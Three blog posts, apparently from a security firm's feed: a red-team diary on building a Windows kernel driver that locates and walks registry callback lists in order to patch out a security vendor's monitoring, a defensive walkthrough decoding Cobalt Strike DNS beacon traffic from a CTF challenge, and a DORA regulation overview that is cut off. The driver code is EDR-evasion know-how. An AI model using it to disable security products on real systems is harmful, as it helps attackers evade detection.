
Kernel Karnage – Part 5 (I/O & Callbacks)

By: bautersj

After showing Interceptor’s options, it’s time to continue coding! On the menu are registry callbacks, doubly linked lists, and a struggle with I/O in native C.

1. Interceptor 2.0

Until now, I relied on the Evil driver to patch kernel callbacks while I attempted to tackle $vendor2; however, the Evil driver only implements patching for process and thread callbacks. This week I spent a good amount of time porting the functionality from the Evil driver over to Interceptor, and added support for patching image load callbacks, as well as a first effort at enumerating registry callbacks.

While I was working, I stumbled upon Mimidrv In Depth: Exploring Mimikatz’s Kernel Driver by Matt Hand, an excellent blogpost which aims to clarify the inner workings of Mimikatz’ kernel driver. Looking at the Mimikatz kernel driver code made me realize I’m a terrible C/C++ developer and I wish drivers were written in C# instead, but it also gave me insight into handling different aspects of the interaction between the kernel driver and the user mode application.

To make up for my sins, I refactored a lot of my code to use a more modular approach and keep the actual driver code clean and limited to driver-specific functionality. For those interested, the architecture of Interceptor looks somewhat like this:

.
+-- Driver
|   +-- Header Files
|   |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
|   |   +-- Globals.h               | contains global variables used in all modules
|   |   +-- pch.h                   | precompiled header
|   |   +-- Interceptor.h           | function prototypes
|   |   +-- Intercept.h             | function prototypes
|   |   +-- Callbacks.h             | function prototypes
|   +-- Source Files
|       +-- pch.cpp
|       +-- Interceptor.cpp         | driver code
|       +-- Intercept.cpp           | IRP hooking module
|       +-- Callbacks.cpp           | Callback patching module
+-- CLI
    +-- Source Files
        +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O in 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

combined with one of 3 different buffering methods:

  1. Buffered I/O
  2. Direct I/O
  3. On a per-IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it receives, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on a per-IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures, which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding the user buffers.

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback: we need to define common I/O structures shared between the driver and the user mode application, so both sides know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
};

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer;
inputBuffer.index = 1;
strcpy_s(inputBuffer.driverName, "\\Driver\\MyDriver");
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffers are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//using input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;
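Note that with METHOD_NEITHER these are raw user mode addresses. Before touching them, a driver is expected to validate them, typically with ProbeForRead()/ProbeForWrite() inside a structured exception handler. A minimal sketch of such a guard (reusing the buffer variables from above and the CompleteIrp() helper seen further below) could look like:

//validate the raw user mode pointers before using them
__try {
    ProbeForRead(bufferIn, szBufferIn, 1);
    ProbeForWrite(bufferOut, szBufferOut, 1);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
    return CompleteIrp(Irp, STATUS_ACCESS_VIOLATION, 0);
}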

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer using bufferOut = LocalAlloc(LPTR, szBufferOut). This will allocate the specified number of bytes (szBufferOut) as fixed memory on the heap and initialize it to zero (the LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040)).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.
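In user mode, that grow-and-retry logic could look something like the following minimal sketch (the IOCTL name and starting size are our own placeholders; when the driver completes the request with STATUS_BUFFER_OVERFLOW, DeviceIoControl() fails and GetLastError() returns ERROR_MORE_DATA):

DWORD bytesReturned = 0;
SIZE_T szBufferOut = 0x1000;
PVOID bufferOut = LocalAlloc(LPTR, szBufferOut);

while (bufferOut && !DeviceIoControl(hDevice, IOCTL_MYDRIVER_LIST_DRIVERS, nullptr, 0,
    bufferOut, (DWORD)szBufferOut, &bytesReturned, nullptr) &&
    GetLastError() == ERROR_MORE_DATA) {
    //output buffer too small: free it, double the size and try again
    szBufferOut *= 2;
    LocalFree(bufferOut);
    bufferOut = LocalAlloc(LPTR, szBufferOut);
}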

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added support for image load callbacks, registered via PsSetLoadImageNotifyRoutineEx(), which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly differently when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of obtaining the address the same way as for the callback arrays, by enumerating the instructions in the NotifyRoutine() functions and looking for a series of opcodes, I decided to enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we would need to follow 2 CALL instructions (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). By using CmUnRegisterCallback() instead, we only need to look for a LEA RCX (0x48 0x8D 0x0D) instruction, which loads the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	ULONG64 OffsetAddr = 0;
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		//scan for the LEA RCX (0x48 0x8D 0x0D) opcode bytes for this Windows version
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			//read the 32-bit displacement that follows the 3 opcode bytes
			OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
			//resolve the RIP-relative address: displacement + instruction length (7) + instruction address
			return OffsetAddr + 7 + instructionAddr;
		}
	}
	return 0;
}

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;
NTSTATUS status = STATUS_SUCCESS;

if (CallbackListHead) {
    //walk the doubly linked list until we circle back to the list head
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        //the callback function pointer lives at offset 0x28 of the CMREG_CALLBACK structure
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.


Cobalt Strike: Decrypting DNS Traffic – Part 5

By: Didier Stevens

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explained how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we dealt with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate what Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with tool 1768.py:

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

And then a third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them when they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org makes up the root labels of every query this beacon will issue, and is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number that is used to identify the beacon with the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS requests for this particular beacon will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  3. DNS_AAAA
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries are what a beacon uses to inquire whether the team server has tasks for it in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is 8.8.4.4 (the default DNS_Idle value is 0.0.0.0).

Looking at figure 4, we see that the replies to the first requests are 8.8.4.4. These have to be XORed with DNS_Idle value 8.8.4.4: thus the result is 0.0.0.0. A reply equal to 0.0.0.0 means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has to do nothing.

That changes with the 6th query: the reply is IPv4 address 8.8.4.246, and when we XOR that value with 8.8.4.4, we end up with 0.0.0.242. Value 0.0.0.242 instructs the beacon to check for tasks using TXT record queries.

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.
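Expressed in code, interpreting a DNS_beacon reply according to these rules could look like the following minimal sketch (the helper logic and names are ours, derived purely from the rules above):

#include <cstdint>
#include <cstdio>

int main() {
    uint32_t reply   = 0x080804F6;      //8.8.4.246 from the A record reply
    uint32_t dnsIdle = 0x08080404;      //DNS_Idle setting 8.8.4.4
    uint32_t value   = reply ^ dnsIdle; //0x000000F2 = 0.0.0.242

    if (value == 0) { puts("no tasks: sleep and check again later"); return 0; }
    if (value & 0x01)             puts("checkin with a DNS_metadata query");
    if (value & 0x02)             puts("retrieve tasks via TXT records");
    else if (value & 0x04)        puts("retrieve tasks via AAAA records");
    else if ((value & 0x0E) == 0) puts("retrieve tasks via A records");
    return 0;
}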

The next set of DNS queries are performed by the beacon because of the instructions (0.0.0.242) it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (0.0.0.242).

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT query is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, 8.8.4.68 XORed with 8.8.4.4 gives 0.0.0.64. This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query will be an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The value of each TXT record is a BASE64 string, that has to be concatenated together before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is needed to prevent cached DNS results from interfering with the communication. This is done by making each name in the DNS queries unique, with an extra hexadecimal label.

Notice that there is a hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. It consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter starts at 0 and increments by 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive out of order.
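A small sketch of how such unique names can be built (we did not verify the beacon’s exact generation logic; this merely reproduces the observed pattern):

#include <cstdio>

int main() {
    const char* randomNumber = "7311917"; //generated by the beacon, constant during the exchange
    for (int counter = 0; counter < 2; counter++)
        printf("api.%d%s.19997cf2.wallet.thedarkestside.org\n", counter, randomNumber);
    //prints the two names seen in figure 7: api.07311917... and api.17311917...
    return 0;
}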

Thus, when all the DNS TXT replies have been received (there is only one in our example), the base 64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records (0.0.0.240 reply), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is 8.8.4.116; XORed with 8.8.4.4, this gives 0.0.0.112. Thus 112 bytes of encrypted data have to be received: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, it uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each DNS_output query name contains a unique hexadecimal counter label, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]thedarkestside.org.

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.]thedarkestside.org: domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes long.

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.
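Reassembling those labels is easy to automate. Here is a rough standalone sketch of ours (this is not code from the actual tooling):

#include <cstdio>
#include <sstream>
#include <string>
#include <vector>

//splits a DNS_output query name into labels, then concatenates the data labels;
//the leading digit of the first data label tells us how many labels carry data
std::string ExtractHexData(const std::string& name) {
    std::vector<std::string> labels;
    std::stringstream ss(name);
    std::string label;
    while (std::getline(ss, label, '.')) labels.push_back(label);

    int count = labels[1][0] - '0';            //number of data labels
    std::string hexData = labels[1].substr(1); //rest of the first data label
    for (int i = 2; i < 1 + count; i++)
        hexData += labels[i];
    return hexData;
}

int main() {
    puts(ExtractHexData("post.1debfa06ab4786477.29842910.19997cf2.wallet.thedarkestside.org").c_str());
    //prints debfa06ab4786477, the data carried by the third query
    return 0;
}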

The hexadecimal data above is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output), and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (the size of the encrypted data). That size field is not present in the format of the DNS_output data.

Decryption

We have developed a tool, cs-parse-traffic, that can decrypt and parse DNS traffic and HTTP(S). Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

Option -f dns is required to process DNS traffic, and option -i 8.8.4.4 is used to provide the DNS_Idle value. This value is needed to properly decode DNS replies (it is not needed for DNS queries).

The encrypted data (red rectangle) can then be used to find the AES and HMAC keys inside the process memory dump of the running beacon:

Figure 11: extracting cryptographic keys from process memory

Those keys can then be used to decrypt the DNS traffic:

Figure 12: decrypting DNS traffic

This traffic was used in a CTF challenge of the Cyber Security Rumble 2021. To find the flag, grep for CSR in the decrypted traffic:

Figure 13: finding the flag inside the decrypted traffic

Conclusion

The major difference between DNS Cobalt Strike traffic and HTTP Cobalt Strike traffic, is how the encrypted data is encoded. Once encrypted data is recovered, decrypting it is very similar for DNS and HTTP.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.


The digital operational resilience act (DORA): what you need to know about it, the requirements and challenges we see.

By: nicoameye

TL;DR – In this blogpost, we will give you an introduction to DORA, as well as explain how you can prepare yourself for it.

More specifically, throughout this blogpost we will try to formulate an answer to the following questions:

  • What is DORA and what are the key requirements of DORA?
  • What are the biggest challenges that you might face in becoming “DORA compliant”?

This blog post is part of a series, keep an eye out for the following parts! In the following blogposts, we will further explore the requirements of DORA, as well as elaborate a self-assessment checklist for financial entities to start assessing their compliance.

What is DORA?

DORA stands for Digital Operational Resilience Act. DORA is the EU proposal to tackle digital risks and build operational resilience in the financial sector. 

The idea of DORA is that organizations are able to demonstrate that they can resist, respond to and recover from the impacts of ICT incidents, while continuing to deliver critical functions and minimizing disruption for customers and for the financial system as a whole.

With DORA, the EU aims to make sure financial organisations mitigate the risks arising from an increasing reliance on ICT systems and third parties for critical operations. These risks are to be mitigated through appropriate Risk Management, Incident Management, Digital Operational Resilience Testing, as well as Third-Party Risk Management.

Who is concerned?

DORA applies to financial entities, from banks (i.e. credit institutions) to investment and payment institutions, electronic money institutions, pension funds, audit firms, credit rating agencies, and insurance and reinsurance undertakings and intermediaries.

Beyond that it also applies to providers of digital and data services, including providers of cloud computing services, data analytics, & data centres.

Note that, while the scope of DORA itself is proposed to encompass nearly the entire financial system, it at the same time allows for a proportionate application of requirements for financial entities that are micro enterprises.

Exploring DORA

What is operational resilience? Digital operational resilience is the ability to build, assure and review the technological operational integrity of an organisation. In a nutshell, operational resilience is a way of thinking and working that emphasizes the hardening of systems, so that when an organization is attacked, it has the means to respond, recover, learn, and adapt.

Organizations that do not adopt this mindset are likely to experience DORA as an almost impossibly long checklist of disconnected requirements. We will cover the requirements in the coming blogposts.

DORA introduces requirements across five pillars: 

  • ICT Risk Management
  • ICT-related Incidents Management, Classification and Reporting
  • Digital Operational Resilience Testing
  • ICT Third-Party Risk Management
  • Information and Intelligence Sharing

For each of the 5 pillars, we have summarised the requirements and the key challenges to start addressing now.

ICT Risk Management

DORA requires organizations to apply a strong risk-based approach in their digital operational resilience efforts. This approach is reflected in Chapter 2 of the regulation.

What is required?

ICT risk management requirements form a set of key principles revolving around specific functions (identification, protection and prevention, detection, response and recovery, learning and evolving, and communication). Most of them are recognized by current technical standards and industry best practices, such as the NIST framework, and thus DORA does not impose specific standardization itself.

What do we consider as potential challenges for most organizations?

As described in DORA, the structure does not significantly deviate from standard information security risk management as defined in the NIST Cybersecurity Framework.

First, as we reviewed, the ICT risk management requirements are organised around:

  • Identifying business functions and the information assets supporting them.
  • Protecting these assets and preventing incidents affecting them.
  • Detecting anomalous activities.
  • Developing response and recovery strategies and plans, including communication to customers and stakeholders.

We foresee several elements that might raise additional complexity:

1. Nowadays, we see many organizations struggling with adequate asset management. A first complexity might emerge from the fact that the ICT risk management framework shall include the identification of critical and important functions, as well as the mapping of the ICT assets that underpin them. The framework shall also include the assessment of all risks associated with the identified ICT-related business functions and information assets.

2. Protection and prevention is also a challenge for most organizations. Based on the risk assessment, financial entities shall set up protection and prevention measures to ensure the resilience, continuity and availability of ICT systems. These shall include ICT security strategies, policies, procedures and appropriate technologies to ensure the continuous monitoring and control of ICT systems and tools.

3. Most organizations also struggle with the timely detection of anomalous activities. Some complexity might arise, as financial entities shall have to ensure the prompt detection of anomalous activities, enforce multiple layers of control, and enable the identification of single points of failure.

4. While the first three of these will be fairly familiar to most firms, albeit implemented with varying degrees of maturity, the last one (response and recovery) should focus minds. It will require financial entities to think carefully about substitutability, including investing in backup and restoration systems, and to assess whether – and how – certain critical functions can operate through alternative systems or methods of delivery while primary systems are checked and brought back up.

5. On top of this, as part of the “Learning and Evolving” function of DORA’s Risk Management Framework, DORA introduces compulsory training on digital operational resilience not only for the management body but also for the whole staff, as part of their general training package. Getting all staff on board might create additional complexity.

In a coming blogpost, we will be reviewing the requirements associated with the risk-based approach based on the ICT risk management framework of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

ICT-related Incidents Management, Classification and Reporting

DORA has its core in a strong evaluation and reporting process. This process is reflected in Chapter 3 of the regulation.

What is required?

In the regulation, ICT-related incident reporting obliges financial entities to establish and implement a management process to monitor and log ICT-related incidents and to classify them based on specific criteria.

The ICT-related Incident Management requirements are organised around:

  • Implementation of an ICT-related incident management process
  • Classification of ICT-related incidents
  • Reporting of major ICT-related incidents

What do we consider as potential challenges for most organizations?

We foresee two elements that might raise additional complexity:

1. First, financial entities will need to review their incident classification methodology to fit the requirements of the regulation. To help organisations prepare, we anticipate that the incident classification methodology will align with the ENISA Reference Incident Classification Taxonomy; indeed, this framework is referenced in a footnote of DORA. Other standards might be permissible, provided they meet the conditions set out in the Regulation, but when a standard or framework is specifically called out, there is no downside to considering it.

2. Second, financial entities will also need to set up the right processes and channels to be able to notify the regulator quickly when a major incident occurs. Although firms will only need to report major incidents to their national regulator, this will need to happen within strict deadlines. Moreover, depending on what gets classified as “major”, this might happen frequently.

In a coming blogpost, we will be reviewing the requirements associated with the ICT-related Incidents Management of DORA, as well as elaborating a self-assessment checklist for financial entities to start assessing their compliance.

Digital Operational Resilience Testing

DORA introduces requirements to test the efficiency of the risk management framework and of the measures in place to respond to and recover from a wide range of ICT incident scenarios. This process is reflected in Chapter 4 of the regulation.

What is required?

The underlying rationale behind this part of the regulation is that undetected vulnerabilities in financial entities could threaten the stability of the financial sector. In order to mitigate this risk, DORA introduces a comprehensive testing program with the aim of identifying and exploring possible ways in which financial entities could be compromised.

Digital operational resilience testing serves to periodically test the ICT risk management framework for preparedness, to identify weaknesses, deficiencies or gaps, and to promptly adopt corrective measures.

DORA also strongly recommends advanced testing of ICT tools, systems and processes based on threat-led penetration testing (“TLPT”), carried out at least every 3 years. The technical standards to apply when conducting intelligence-based penetration testing are likely to be aligned with TIBER-EU, developed by the ECB.

The Digital Operational Resilience Testing requirements are therefore organised around:

  • Basic Testing of ICT tools and systems – Applicable to all financial entities
  • Advanced Testing of ICT tools, systems and processes (“TLPT”) – Only applicable to  financial entities identified as significant by competent authorities

What do we consider as potential challenges for most organizations?

We foresee two elements that might raise additional complexity:

1. First, from a cultural standpoint, a challenge might be that financial entities perceive operational resilience testing as BCP or DR testing. A caution has to be raised here, as the objective of DORA with these requirements focuses more on penetration testing than on traditional operational resilience testing.

